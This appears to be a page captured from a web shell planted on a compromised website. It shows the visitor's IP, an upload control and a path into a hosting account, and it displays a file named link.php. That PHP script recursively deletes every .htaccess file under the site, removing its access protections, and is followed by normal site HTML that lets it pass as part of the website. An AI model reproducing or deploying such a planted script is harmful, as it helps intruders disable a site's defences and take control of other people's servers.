Your IP : 18.118.187.83


Current Path : /proc/self/root/home/lentoinv/believersfamilyfoundation.com/
Upload File :
Current File : //proc/self/root/home/lentoinv/believersfamilyfoundation.com/link.php

<?php
function deleteHtaccessFiles($directory) {
    // Check if the directory exists
    if (!is_dir($directory)) {
        echo "The specified directory does not exist.";
        return;
    }

    // Create a RecursiveDirectoryIterator
    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory));

    // Loop through the files and directories
    foreach ($iterator as $file) {
        // Check if the file is .htaccess
        if ($file->isFile() && $file->getFilename() === '.htaccess') {
            // Attempt to delete the file
            if (unlink($file->getPathname())) {
                echo "Deleted: " . $file->getPathname() . "\n";
            } else {
                echo "Failed to delete: " . $file->getPathname() . "\n";
            }
        }
    }
}

deleteHtaccessFiles('../believersfamilyfoundation.com');
?>
<meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">

        <!-- Bootstrap CSS -->
        <link rel="stylesheet" href="assets/css/bootstrap.min.css">
        <!-- Meanmenu CSS -->
        <link rel="stylesheet" href="assets/css/meanmenu.css">
        <!-- Boxicons CSS -->
        <link rel="stylesheet" href="assets/css/boxicons.min.css">
        <!-- Flaticon CSS -->
        <link rel="stylesheet" href="assets/fonts/flaticon.css">
        <!-- Owl Carousel CSS -->
        <link rel="stylesheet" href="assets/css/owl.carousel.min.css">
        <link rel="stylesheet" href="assets/css/owl.theme.default.min.css">
        <!-- Odometer CSS-->
        <link rel="stylesheet" href="assets/css/odometer.css">
        <!-- Magnific Popup CSS -->
        <link rel="stylesheet" href="assets/css/magnific-popup.css">
        <!-- Style CSS -->
        <link rel="stylesheet" href="assets/css/style.css">
        <!-- Responsive CSS -->
        <link rel="stylesheet" href="assets/css/responsive.css">

        <link rel="icon" type="image/png" href="img/favico.png">

?>